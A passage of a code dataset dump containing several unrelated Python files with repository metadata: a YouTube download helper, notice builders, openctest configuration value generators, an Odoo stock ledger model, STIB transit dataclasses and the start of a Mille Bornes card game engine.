@staticmethod\n def get_video_data():\n videoObj = VideoData.get_video_link()\n dict_streams = VideoData.print_video_res_types(videoObj)\n typeToDownload = VideoData.get_type_video(dict_streams)\n res = VideoData.get_resolution_video(dict_streams, typeToDownload)\n destinationLocation = VideoData.get_valid_location()\n file_name = VideoData.get_file_name()\n\n return videoObj.streams.filter(mime_type= typeToDownload, resolution= res).first(), destinationLocation, file_name\n\n\n @staticmethod\n def get_video_link():\n while True:\n link = input(\"enter link video you want to download : \")\n try:\n yt = YouTube(link)\n break\n except:\n print(\"please enter valid link\")\n return yt\n\n @staticmethod\n def get_type_video(dict_streams):\n while True:\n video_type = input(\"enter video type as \\\"video/3gpp\\\" \\\"audio/mp4\\\" : \")\n if video_type in dict_streams:\n return video_type\n else:\n print(\"please enter valid type as writen before\")\n\n @staticmethod\n def get_resolution_video(dict_streams, type_video):\n while True:\n quality = input(\"enter quality of video or audio you want\")\n if quality in dict_streams[type_video]:\n return quality\n else:\n print(\"please enter valid quality\")\n\n @staticmethod\n def get_valid_location():\n loc = input(\"enter location you want to download in it : \")\n if os.path.exists(loc):\n return loc\n else:\n return VideoData.get_valid_location()\n\n @staticmethod\n def print_video_res_types(video):\n dict_streams = {}\n print(\"this all types and resolution that found\")\n\n for stream in video.streams:\n dict_streams[stream.mime_type] = []\n\n\n for stream_mime_type in dict_streams:\n for stream in video.streams.filter(mime_type = stream_mime_type):\n if stream.resolution:\n dict_streams[stream_mime_type].append(stream.resolution)\n elif stream.audio_codec:\n dict_streams[stream_mime_type].append(stream.audio_codec)\n if dict_streams[stream_mime_type]:\n print(str(stream_mime_type) + \" : \" + str(dict_streams[stream_mime_type]))\n\n return dict_streams\n\n @staticmethod\n def get_file_name():\n name = input(\"enter name of file as you want to save it, to download with the common name enter x\")\n return name\n","repo_name":"mariomalak1/Youtube-Download-Vedio-and-Audio","sub_path":"YoutubeDownlader/GetData.py","file_name":"GetData.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73555393192","text":"import time\nimport bson\ndef ObjectId(id):\n return bson.objectid.ObjectId(id)\ndef get_timestamp():\n return time.time()\n\ndef produce_notice_system_tip(topic,toUser,content):\n if topic == 'tip_finish':\n rcontent = {\n 'tipId':content['tipId'], \n }\n else:\n return None\n notice = {\n 'type':'system',# system/\n 'unit':'tip',#appointment\n 'topic':topic,#order_request/order_finish/order_accept/order_comment\n 'toUser':toUser,\n 'content':rcontent,\n 'time':get_timestamp(),\n 'state':'on',\n 'handled':False,\n }\n return notice\ndef produce_notice_system_appointment(topic,toUser,content):\n if topic == 'order_request' :\n rcontent={\n 'orderId':content['orderId'],\n }\n elif topic == 'order_accept':\n rcontent={\n 'orderId':content['orderId'],\n }\n elif topic == 'order_finish':\n rcontent={\n 'orderId':content['orderId'],\n }\n elif topic == 'order_comment':\n rcontent={\n 'orderId':content['orderId'],\n }\n else:\n return None\n notice={\n 'type':'system',# system/\n 'unit':'appointment',#appointment\n 
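# same schema as the system 'tip' notice above; 'topic' narrows the order event\n 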
'topic':topic,#order_request/order_finish/order_accept/order_comment\n 'toUser':toUser,\n 'content':rcontent,\n 'time':get_timestamp(),\n 'state':'on',\n 'handled':False,\n }\n return notice\n \n","repo_name":"Chao-Lu/superman","sub_path":"handler/unit/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21694192763","text":"import re\nimport random\nimport config\nimport sys\n\nNONE = \"NOTYPE\"\nINT = \"INT\"\nFLOAT = \"FLOAT\"\nBOOL = \"BOOL\"\nFILEPATH = \"FILEPATH\"\nIP = \"IP\"\nPORT = \"PORT\"\nIPPORT = \"IPPORT\"\nCLASSNAME = \"CLASSNAME\"\nDIRPATH = \"DIRPATH\"\nINTLIST = \"INTLIST\"\nSTRLIST = \"STRLIST\"\nTIME = \"TIME\"\nDATA = \"DATA\"\nPM = \"PM\"\nPC = \"PC\"\nZKDIR = \"ZKDIR\"\nZKPORT = \"ZKPORT\"\nZKPORTADDRESS = \"ZKPORTADDRESS\"\nZKLIMIT = \"ZKLIMIT\"\nZKSIZE = \"ZKSIZE\"\nALGO = \"ALGORITHM\"\nUSER = \"USER\"\nGROUP = \"GROUP\"\nNAMESERVICES = \"NAMESERVICES\"\nINTERFACE = \"INTERFACE\"\nPOTENTIALFLOAT = \"POTENTIALFLOAT\"\n\ntimeunits = [\"ms\", \"millisecond\", \"s\", \"sec\", \"second\", \"m\", \"min\", \"minute\", \"h\", \"hr\", \"hour\", \"d\", \"day\"]\ndatasize = [\"MB\"]\nALPHABETS = [\n \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\", \n \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \n]\n\n# guess from value\ndef isBool(s):\n if s.lower() == \"true\" or s.lower() == \"false\":\n return True\n else:\n return False\n\ndef isPort(name, value):\n if value == \"\" and name.endswith(\".port\"):\n return True\n if isInt(value) and name.endswith(\".port\"):\n return True\n return False\n\ndef isPermissionMask(name, value):\n if len(value) == 3 and \"umask\" in name:\n try:\n _ = int(\"0o\" + value, base=8)\n return True\n except ValueError:\n return False\n\ndef isPermissionCode(s):\n if len(s) == 9:\n m = re.match(r\"^[rwx]+$\", s)\n if m:\n return True\n return False\n\ndef isInt(s):\n try:\n _ = int(s)\n return True\n except ValueError:\n return False\n\ndef isFloat(s):\n m = re.match(r\"^\\d+\\.\\d+[fF]$\", s)\n if m:\n s = s[:-1]\n try:\n _ = float(s)\n return True\n except ValueError:\n return False\n\ndef isIpAddr(s):\n m = re.match(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\", s)\n return m is not None\n\ndef isIpPortAddr(s):\n m = re.match(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+$\", s)\n return m is not None\n\ndef isClassName(s):\n return s.startswith(\"org.apache.hadoop\") or s.startswith(\"alluxio.\")\n\ndef isFilePath(s):\n # extend, ${} and \"/\" in dvalue\n if re.match(r\"\\$\\{.*\\}\", s) and \"/\" in s:\n return True\n elif s.startswith(\"/\"):\n return True\n else:\n return \n\ndef isIntList(s):\n elements = s.split(\",\")\n res = True\n for ele in elements:\n res &= isInt(ele)\n return res\n\ndef isStringList(s):\n return s.count(\",\") > 0\n\ndef isTime(s):\n for unit in timeunits:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n return True\n return False\n\ndef isDataSize(s):\n for unit in datasize:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n return True\n return False\n\ndef isAlgorithm(s):\n return s.endswith(\".algorithm\")\n\n# guess from name\ndef isFilePath2(name):\n return name.endswith(\".conf\") or 
name.endswith('.path')\n\ndef isFilePath3(name):\n return name.endswith(\".file\") or name.endswith(\".file.name\") or name.endswith(\"keytab\")\n\ndef isDirPath(name):\n return name.endswith(\".dir\")\n\ndef isAddr(name):\n return name.endswith(\".addr\") or name.endswith(\".addresses\") or name.endswith(\".hostname\") or name.endswith(\"address\")\n\ndef isClassName2(name):\n return name.endswith(\".class\") or name.endswith(\".classes\")\n\ndef isUser(name):\n return name.endswith(\"user\") or name.endswith(\"users\")\n\ndef isGroup(name):\n return name.endswith(\"group\") or name.endswith(\"groups\")\n\ndef isNameservices(name):\n return name.endswith(\"nameservices\")\n\ndef isInterface(name):\n return name.endswith(\"interface\") or name.endswith(\"interfaces\")\n\ndef isPotentialFloat(name):\n return name.endswith(\"limit\") or name.endswith(\"size\")\n\n# guess from semantics\ndef isFilePath4(semantics):\n return \"relative path\" in semantics or \"directory\" in semantics or \"folder\" in semantics\n\ndef genBool(param):\n upcnt = 0\n lowcnt = 0\n for char in param.dvalue:\n if char.isupper():\n upcnt += 1\n elif char.islower():\n lowcnt += 1\n ret = \"True\"\n if param.dvalue.lower() == \"true\":\n ret = \"False\"\n elif param.dvalue.lower() == \"false\":\n ret = \"True\"\n if upcnt == 0:\n return [ret.lower()]\n elif lowcnt == 0:\n return [ret.upper()]\n else:\n return [ret]\n\ndef genPermissionMask(param):\n return config.PERMISSIONMASKS\n\ndef genPermissionCode(param):\n return config.PERMISSIONCODES\n\ndef genInt(param):\n val = int(param.dvalue)\n sign = 1\n if val < 0:\n sign = -1\n val = -1 * val\n if val == 1:\n return [0, sign*2]\n elif val == 0:\n return [1, -1]\n else:\n if val <= 10:\n return [sign*1, sign*2*val]\n else:\n return [sign*val//2, sign*val*2]\n\ndef genIntList(param):\n vals = param.dvalue.split(\",\")\n l1 = []\n l2 = []\n for val in vals:\n l1.append(int(val)//2)\n l2.append(int(val)*2)\n return [l1, l2]\n\ndef genStringList(param):\n vals = param.dvalue.split(\",\") # /, ;\n assert len(vals) >= 2\n return [vals[0], vals[1]]\n\ndef genFloat(param):\n s = param.dvalue\n m = re.match(r\"^\\d+\\.\\d+[fF]$\", s)\n if m:\n s = s[:-1]\n val = float(s)\n if val == 0.0:\n return [1.0, -1.0]\n else:\n return [val/2, val*2]\n\ndef genPort(param):\n return config.PORTS\n\ndef genIPPort(param):\n s = param.dvalue\n s = s[:s.find(\":\")]\n return [s + \":\" + str(config.PORTS[0]), s + \":\" + str(config.PORTS[1])]\n\ndef genIP(param):\n return config.IPS\n\ndef genFilePath(param):\n return config.FILEPATHS\n\ndef genDirPath(param):\n return config.DIRPATHS\n\ndef genTime(param):\n s = param.dvalue\n for unit in timeunits:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n t = int(t)\n if t == 0:\n return [\"1\" + unit, \"2\" + unit]\n elif t == 1:\n return [\"10\" + unit, \"2\" + unit]\n return [\"1\" + unit, str(2*t) + unit]\n\ndef genData(param):\n s = param.dvalue\n for unit in datasize:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n t = int(t)\n if t == 0:\n return [\"1\" + unit, \"2\" + unit]\n elif t == 1:\n return [\"10\" + unit, \"2\" + unit]\n return [\"1\" + unit, str(2*t) + unit]\n\ndef genUser(param):\n return config.USERS\n\ndef genGroup(param):\n return config.GROUPS\n\ndef genNameservices(param):\n return config.NAMESERVICES\n\ndef genInterface(param):\n return config.INTERFACES\n\ndef genAlgorithm(param):\n return semanticExtractionNoType(param)\n\ndef genPotentialFloat(param):\n return [0.1, 0.5]\n\ndef 
semanticExtractionClassName(param):\n # strategies\n # replace \"/\" in semantics with \" \"\n semantics = param.description + \" \"\n # extract words after key phrases from semantics\n arrs = [[], [], []]\n for phrase in config.key_phrases_plural:\n if phrase in semantics:\n parts = semantics.split(phrase)\n raw = parts[1].split(\".\")[0]\n raw = raw.replace(\",\", \" \")\n raw = raw.replace(\" and \", \" \")\n raw = raw.replace(\" or \", \" \")\n raw = raw.strip()\n arrs[0] = raw.split()\n break\n for phrase in config.key_phrases_singular:\n if phrase in semantics:\n parts = semantics.split(phrase)\n tmp = parts[1].split(\".\")[0]\n tmp = tmp.strip()\n arrs[1] = [tmp]\n break\n # select ,from arr1, arr2 the one containing least non word characters\n # break tie by selecting the one with more values other than SKIP\n nonword = re.compile('\\W')\n selected = 0\n mincnt = sys.maxsize\n for idx, arr in enumerate(arrs):\n match = nonword.findall(\"\".join(arr))\n match = [x != \",\" for x in match]\n if mincnt > len(match):\n selected = idx\n mincnt = len(match)\n elif mincnt == len(match):\n if len(arrs[selected]) < len(arr):\n selected = idx\n arr = []\n hasCapital = False\n for char in param.dvalue:\n if char.isupper():\n hasCapital = True\n break\n for word in arrs[selected]:\n if word == param.dvalue:\n continue\n elif hasCapital:\n for char in word:\n if char.isupper():\n arr.append(word)\n break\n if len(arr) != 0:\n return arr[0:2]\n return []\n\ndef semanticExtractionNoType(param):\n # strategies\n # replace \"/\" in semantics with \" \"\n semantics = param.description + \" \"\n arrs = [[], [], []]\n for phrase in config.key_phrases_plural:\n if phrase in semantics:\n parts = semantics.split(phrase)\n raw = parts[1].split(\".\")[0]\n \n if \".\" not in parts[1] and len(parts) == 2:\n raw = parts[1]\n raw = raw.replace(\",\", \" \")\n raw = raw.replace(\":\", \" \")\n raw = raw.replace(\" and \", \" \")\n raw = raw.replace(\" or \", \" \")\n raw = raw.strip()\n arrs[0] = raw.split()\n break\n for phrase in config.key_phrases_singular:\n if phrase in semantics:\n parts = semantics.split(phrase)\n tmp = parts[1].split(\".\")[0]\n tmp = tmp.strip()\n arrs[1] = [tmp]\n break\n # select ,from arr1, arr2 the one containing least non word characters\n # break tie by selecting the one with more values other than SKIP\n nonword = re.compile('\\W')\n selected = 0\n mincnt = sys.maxsize\n for idx, arr in enumerate(arrs):\n match = nonword.findall(\"\".join(arr))\n match = [x != \",\" for x in match]\n if mincnt > len(match):\n selected = idx\n mincnt = len(match)\n elif mincnt == len(match):\n if len(arrs[selected]) < len(arr):\n selected = idx\n arr = []\n hasCapital = False\n for char in param.dvalue:\n if char.isupper():\n hasCapital = True\n break\n for word in arrs[selected]:\n if word == param.dvalue:\n continue\n elif hasCapital:\n for char in word:\n if char.isupper():\n arr.append(word)\n break\n else:\n allLower = True\n for char in word:\n if not char.islower():\n allLower = False\n if allLower:\n arr.append(word)\n if len(arr) != 0:\n return arr[0:2]\n # map out all capital words\n tmpWord = \"\"\n skipChars = []\n specialChars = []\n arr = []\n for char in param.dvalue:\n if char not in ALPHABETS:\n skipChars.append(char)\n for char in semantics:\n if char.isupper() or char in skipChars:\n tmpWord += char\n elif char != \" \" and char not in ALPHABETS:\n tmpWord += char\n specialChars.append(char)\n elif len(tmpWord) > 2:\n if tmpWord[0] not in ALPHABETS:\n tmpWord = tmpWord[1:]\n 
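# symmetric trim: drop a single trailing non-letter as well\n 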
if tmpWord[-1] not in ALPHABETS:\n tmpWord = tmpWord[0:-1]\n if tmpWord != param.dvalue:\n for schar in specialChars:\n if schar in tmpWord:\n tmpWord = \"\"\n if tmpWord != \"\":\n arr.append(tmpWord)\n tmpWord = \"\"\n else:\n tmpWord = \"\"\n \n capcnt = 0\n for char in param.dvalue:\n if char.isupper() or char in skipChars:\n capcnt += 1\n if capcnt != len(param.dvalue) or capcnt == 0:\n arr = []\n if len(arr) != 0:\n return arr[0:2]\n return []\n\ndef genClassName(param):\n return semanticExtractionClassName(param)\n\ndef genNoType(param):\n return semanticExtractionNoType(param)\n\n# for zk only\n\ndef isZKDirPath(name):\n return name.endswith(\"Dir\")\n\ndef isZKLimit(name):\n return name.endswith(\"Limit\")\n\ndef isZKPort(name):\n return name.endswith(\"Port\")\n\ndef isZKPortAddress(name):\n return name.endswith(\"PortAddress\")\n\ndef isZKSize(name):\n return name.endswith(\"size\")\n\ndef genZKDir(param):\n return config.DIRPATHS\n\ndef genZKPort(param):\n return config.PORTS\n\ndef genZKPortAddress(param):\n return config.ZKPORTADDRS\n\ndef genZKLimit(param):\n return config.ZKLIMIT\n\ndef genZKSize(param):\n return config.ZKSIZE\n","repo_name":"xlab-uiuc/openctest","sub_path":"core/generate_value/gutil.py","file_name":"gutil.py","file_ext":"py","file_size_in_byte":12730,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"12142110548","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError, UserError\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime, date\n\n\n\nclass IndentLedger(models.Model):\n _name = 'stock.log.book'\n _description = \"Issue Request\"\n\n employee_id = fields.Many2one('hr.employee', string='Requested/Received By')\n branch_id = fields.Many2one('res.branch', string='Branch', store=True)\n Indent_id = fields.Many2one('indent.request', string='Indent/GRN')\n Indent_item_id = fields.Many2one('indent.request.items', string='Indent Item')\n item_category_id = fields.Many2one('indent.stock', string='Item Category')\n item_id = fields.Many2one('child.indent.stock', string='Item')\n specification = fields.Text('Specifications')\n serial_bool = fields.Boolean(string='Serial Number')\n serial_number = fields.Char(string='Serial Number')\n requested_quantity = fields.Integer('Requested Quantity')\n approved_quantity = fields.Integer('Approved Quantity')\n requested_date = fields.Date('Requested Date')\n approved_date = fields.Date('Approved Date', default=fields.Date.today())\n opening = fields.Integer('Opening')\n quantity = fields.Integer('Quantity')\n balance = fields.Integer('Balance')\n\n\n indent_type = fields.Selection([('issue', 'Issue'), ('grn', 'GRN')\n ],track_visibility='always', string='Type')\n","repo_name":"gotorishab/stpi","sub_path":"indent_stpi/models/stock_log_book.py","file_name":"stock_log_book.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21364918116","text":"from csv import reader\nfrom io import BytesIO\nfrom dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import List, Optional\n\nfrom dataclasses_json import LetterCase, dataclass_json\n\nfrom .passing_times import Destination\n\nNOT_FOUND = \"NOT FOUND\"\n\n\nclass RouteType(Enum):\n \"\"\"STIB network route type enumeration.\"\"\"\n\n TRAM = 0\n METRO = 1\n BUS = 3\n\n\n@dataclass_json(letter_case=LetterCase.CAMEL)\n@dataclass\nclass 
LinePoint:\n    \"\"\"Dataclass for a stop/point of a STIB line.\"\"\"\n\n    id: str = \"\"\n    order: int = 0\n    stop_name: str = \"\"\n    stop_name_fr: str = \"\"\n    stop_name_nl: str = \"\"\n\n    def set_stop_names(self, stops_csv_file: BytesIO, translations_csv_file: BytesIO):\n        \"\"\"Extract stop name and translations from csv files.\"\"\"\n\n        self.stop_name = self._set_generic_stop_name(stops_csv_file)\n        self.stop_name_fr = self._set_stop_name_translation(\"fr\", translations_csv_file)\n        self.stop_name_nl = self._set_stop_name_translation(\"nl\", translations_csv_file)\n\n    def _set_generic_stop_name(self, stops_csv_file: BytesIO) -> str:\n        \"\"\"Extract the generic stop name from the csv stops file.\"\"\"\n\n        csv_reader = reader(stops_csv_file.getvalue().decode(\"utf-8\").splitlines())\n        for stop_info in csv_reader:\n            if stop_info[0] == self.id:\n                return stop_info[2]\n        return NOT_FOUND\n\n    def _set_stop_name_translation(\n        self, language: str, translations_csv_file: BytesIO\n    ) -> str:\n        \"\"\"Extract stop name translation from csv translations file.\"\"\"\n\n        csv_reader = reader(\n            translations_csv_file.getvalue().decode(\"utf-8\").splitlines()\n        )\n        for translation_info in csv_reader:\n            if (\n                translation_info[0] == self.stop_name\n                and translation_info[2] == language\n            ):\n                return translation_info[1]\n        return NOT_FOUND\n\n\n@dataclass_json(letter_case=LetterCase.CAMEL)\n@dataclass\nclass LineDetails:\n    \"\"\"Dataclass for details of a STIB line.\"\"\"\n\n    destination: Optional[Destination] = None\n    direction: str = \"\"\n    line_id: str = \"\"\n    points: List[LinePoint] = field(default_factory=list)\n    route_type: Optional[RouteType] = None\n\n    def set_route_type(self, routes_csv_file: BytesIO):\n        \"\"\"Extract route type from csv routes file.\"\"\"\n\n        csv_reader = reader(routes_csv_file.getvalue().decode(\"utf-8\").splitlines())\n        for route_info in csv_reader:\n            if route_info[1] == self.line_id:\n                self.route_type = RouteType(int(route_info[4]))\n\n        # Hardcode the route type if not defined... need to change this later\n        if not self.route_type:\n            self.route_type = RouteType(1)\n","repo_name":"Antoninj/stib-alexa-skill","sub_path":"lambda/custom/core/service/model/line_stops.py","file_name":"line_stops.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"75051733031","text":"import random # Shuffle (Deck - cards)\n\n# --------------------\n# Helper functions\n\ndef card_matrix_build():\n    \"\"\"\n    Return list of unique card types\n    \n    Structure: [[Card Type, Card Value],]\n    \n    Index is used in defining game state\n    \"\"\"\n    return [['Distance', 25], ['Distance', 50], ['Distance', 75], ['Distance', 100], ['Distance', 200], \n            ['Remedy', 'Gasoline'], ['Remedy', 'Spare Tire'], ['Remedy', 'Repairs'], ['Remedy', 'End of Limit'], ['Remedy', 'Roll'], \n            ['Safety', 'Extra Tank'], ['Safety', 'Puncture-Proof'], ['Safety', 'Driving Ace'], ['Safety', 'Right-of-Way'], \n            ['Hazard', 'Out of Gas'], ['Hazard', 'Flat Tire'], ['Hazard', 'Accident'], ['Hazard', 'Speed Limit'], ['Hazard', 'Stop']\n           ]\n\ndef action_matrix_build(card_matrix):\n    \"\"\"\n    card_matrix (list) - list of unique card options\n    \n    Return list of all possible actions\n    \n    List Structure: \n        Indices: 0 - 75 (76 actions) - normal play of cards (discard or on a team's pile)\n            [[Team index | -1 (Discard), Card Type, Card Value],]\n            e.g. 
[[-1, 'Distance', 25], [-1, 'Distance', 50], ...]\n        Indices: 76 - 90 (15 actions) - coup fourre options\n            [[Team index, 'Coup Fourre', Card Value | 'Do not play'],]\n            e.g. [[0, 'Coup Fourre', 'Extra Tank'], [0, 'Coup Fourre', 'Puncture-Proof'], ...]\n        Indices: 91 - 96 (6 actions) - extension options\n            [[Team index, 'Extension', Yes | No],]\n            e.g. [[0, 'Extension', 'Yes'], [0, 'Extension', 'No'], [1, 'Extension', 'Yes'], ...]\n    \n    \"\"\"\n    \n    action_list = []\n    \n    # Indices: 0 - 75 - normal play of cards in either discard (team_option[0] = -1) or on a team's piles\n    team_options = [-1, 0, 1, 2]\n    \n    for t in team_options:\n        for c in card_matrix:\n            action_list.append([t, c[0], c[1]])\n    \n    # Add coup fourre options\n    team_options = [0, 1, 2]\n    card_options = ['Extra Tank', 'Puncture-Proof', 'Driving Ace', 'Right-of-Way', 'Do not play']\n    \n    for t in team_options:\n        for c in card_options:\n            action_list.append([t, 'Coup Fourre', c])\n    \n    # Add extension options\n    team_options = [0, 1, 2]\n    card_options = ['Yes', 'No']\n    \n    for t in team_options:\n        for c in card_options:\n            action_list.append([t, 'Extension', c])\n    \n    return action_list\n\ndef safety_counter(hazard_value):\n    \"\"\"\n    Return the Safety Card Value that counters the given hazard\n    \"\"\"\n    \n    safety_choices = ['Extra Tank', 'Puncture-Proof', 'Driving Ace', 'Right-of-Way', 'Right-of-Way']\n    hazard_index = ['Out of Gas', 'Flat Tire', 'Accident', 'Speed Limit', 'Stop'].index(hazard_value)\n    return safety_choices[hazard_index]\n\ndef actions_space(state, card_matrix, action_matrix):\n    \"\"\"\n    Return all available actions given the current game state\n    \n    state ([int]) - current game state\n    card_matrix (list) - lookup card info by index\n    action_matrix (list) - lookup action info by index\n    \n    Return ([int]) - action indices\n    \"\"\"\n    \n    # Break state list into variables for easier legibility of code\n    number_of_players = state[0]\n    play_status = state[1]\n    extension_team = state[2]\n    team_current_index = state[3]\n    last_action_index = state[5]\n    team_status = [] #2D shape ( 2 or 3 rows (teams), 8 (see below) (speed status, battle status, distance points, 200's played) )\n    # team status index: 0 = Speed Status; 1 = Battle Status; 2 = Distance points; 3 = 200's played\n    #                    4 = Extra Tank; 5 = Puncture Proof; 6 = Driving Ace; 7 = Right-of-Way\n    team_status.append(state[16:24]) # Team 1 (0 index)\n    team_status.append(state[24:32]) # Team 2\n    if state[32] > -1:\n        team_status.append(state[32:40]) # Team 3\n    player_hand = [Card(card_matrix[c][0], card_matrix[c][1]) for c in state[40:47] if c > -1]\n    \n    # Variable to hold valid actions - use set to prevent duplicate action potentials (e.g. 
player has 2 cards of the same value)\n    player_actions = set()\n    \n    if play_status == 0 or play_status == 3:\n        # Normal game play\n\n        for card in player_hand:\n\n            # Play options - cards that can be played on the \"table\" (not discarded)\n            if card.type == \"Safety\":\n                # Safeties can be played on own team at any point\n                player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n            elif card.type == \"Distance\":\n                # Distance can be played on own team:\n                # Team cannot exceed 1,000 distance points (or 700 if Extension has not yet been called for 2, 3, or 6 player games)\n                # Top card in Battle Pile is Roll OR Right-of-Way Safety has been played and no other Hazard card is top of battle pile\n                # Distance = 200 - Team cannot play more than two 200 distance cards\n                # Distance > 50 = Top card in Speed Pile is End of Limit or null OR Right-of-Way Safety has been played\n\n                # Team will not exceed 700/1,000 if played\n                if (number_of_players == 4):\n                    max_points = 1000\n                else:\n                    max_points = 700 if extension_team == -1 else 1000\n\n                if (team_status[team_current_index][2] + card.value) <= max_points:\n\n                    if team_status[team_current_index][1] == 4:\n                        # Battle Status: Team can go\n\n                        if card.value <= 50:\n                            # Status of Speed Pile is irrelevant\n                            player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n                        else:\n                            if team_status[team_current_index][0] == 0:\n                                # No speed limit, ensure distance of 200 can be played\n                                if card.value < 200 or team_status[team_current_index][3] < 2:\n                                    player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n\n            elif card.type == \"Remedy\":\n                # Remedies can be played on own team to counter a hazard unless own team has appropriate safety already played\n\n                if card.value == \"Roll\" and team_status[team_current_index][1] == 3:\n                    player_actions.add(action_matrix.index([team_current_index, card.type, card.value])) \n                elif card.value == \"End of Limit\":\n                    # Speed Pile\n                    if team_status[team_current_index][0] == 1:\n                        player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n                \n                # Battle Pile\n                elif card.value == 'Gasoline' and team_status[team_current_index][1] == 0:\n                    player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n                elif card.value == 'Spare Tire' and team_status[team_current_index][1] == 1:\n                    player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n                elif card.value == 'Repairs' and team_status[team_current_index][1] == 2:\n                    player_actions.add(action_matrix.index([team_current_index, card.type, card.value]))\n\n            else:\n                # Card Type: Hazard - can only be played on opponents\n\n                # Can always play on opponents unless they have a safety in place (can be played on top of other hazards)\n                safety_value = safety_counter(card.value)\n                safety_index = [\"Extra Tank\", \"Puncture-Proof\", \"Driving Ace\", \"Right-of-Way\"].index(safety_value) + 4\n\n                for i in range(len(team_status)):\n                    if i == team_current_index:\n                        continue\n\n                    if team_status[i][safety_index] == 0:\n                        player_actions.add(action_matrix.index([i, card.type, card.value]))\n\n            # Discard - all cards can be discarded\n            player_actions.add(action_matrix.index([-1, card.type, card.value]))\n\n    elif play_status == 1:\n        # Coup Fourre Check (hazard played) - Evaluate possible actions\n        hazard_value = action_matrix[last_action_index][2]\n        safety_value = safety_counter(hazard_value)\n        has_safety = False\n        \n        for card in player_hand:\n            if card.type == \"Safety\" and card.value 
== safety_value:\n                has_safety = True\n        \n        if has_safety == True:\n            # Player has the safety, give them the option to play it or not\n            player_actions.add(action_matrix.index([team_current_index, \"Coup Fourre\", safety_value]))\n            player_actions.add(action_matrix.index([team_current_index, \"Coup Fourre\", \"Do not play\"]))\n\n        # (else:) Player does not have safety, start the next player's turn (return an empty list)\n\n    elif play_status == 2:\n        # Extension Check - Current player reached 700 points, provide options to go into Extended play\n        player_actions.add(action_matrix.index([team_current_index, \"Extension\", \"Yes\"]))\n        player_actions.add(action_matrix.index([team_current_index, \"Extension\", \"No\"]))\n\n    # Convert player actions to a list (Set cannot be used with certain functions like random.choice)\n    return list(player_actions)\n\n# --------------------\n# Card\nclass Card():\n    \"\"\"\n    Representation of a single card in the deck\n    \"\"\"\n    \n    def __init__ (self, card_type, card_value):\n        # Type: Hazard, Remedy, Safety, Distance\n        self.type = card_type\n        # Value: Either the name of the card or point value\n        self.value = card_value\n    \n# --------------------\n# Deck\nclass Deck():\n    \"\"\"\n    Represents the full deck of cards\n    \n    Attributes\n        cards ([Card]) - all cards not yet in play (i.e. face-down deck on the table)\n        cards_discard ([Card]) - cards that have been discarded\n    \n    Expected Card Counts:\n        106 - full deck for 4 or 6 players\n            46 - distance\n            38 - remedy\n            4 - safety\n            18 - hazard\n        101 - full deck for 2 or 3 players\n            13 - hazard (1 of each type removed)\n        Start of game, after dealing 6 cards:\n            2 players - 89\n            3 players - 83\n            4 players - 82\n            6 players - 70\n    \"\"\"\n    \n    def __init__ (self, card_matrix, players_count):\n        \"\"\"\n        card_matrix (list) - reference of unique cards in the deck\n        players_count (int) - number of game players\n        \"\"\"\n        \n        # All cards not yet in play (i.e. the deck, face-down on the table)\n        self.cards = []\n        \n        # Cards which have been discarded and may no longer be played\n        self.cards_discard = []\n        \n        # Setup the playable deck\n        self.build(card_matrix, players_count)\n        \n        # Shuffle the deck\n        random.shuffle(self.cards)\n    \n    def build(self, card_matrix, players_count):\n        # Initialize the cards in the deck (assumes the deck has been cleared)\n        num_of_cards = [10, 10, 10, 12, 4, 6, 6, 6, 6, 14, 1, 1, 1, 1]\n        \n        if players_count < 4:\n            num_of_cards.extend([2, 2, 2, 3, 4])\n        else:\n            num_of_cards.extend([3, 3, 3, 4, 5])\n        \n        for i in range(len(card_matrix)):\n            self.cards += num_of_cards[i] * [Card(card_matrix[i][0], card_matrix[i][1])]\n    \n    def draw(self):\n        return self.cards.pop()\n    \n# --------------------\n# Team\nclass Team():\n    \"\"\"\n    A team can have:\n        1 player - games with 2 or 3 total players\n        2 players - games with 4 or 6 total players\n    \n    Attributes:\n    \n    General\n        name (str) - team name (e.g. \"Team 1\")\n    \n    Card lists: full history of cards played\n        safety_pile ([Card]) - safety cards played (including coup fourre)\n        speed_pile ([Card]) - speed limit and end-of-limit hazard cards played\n        battle_pile ([Card]) - hazards, remedies, and go cards\n        distance_pile ([Card]) - distance cards played\n    \n    State: current state of the team (these are applied after all logic - e.g. 
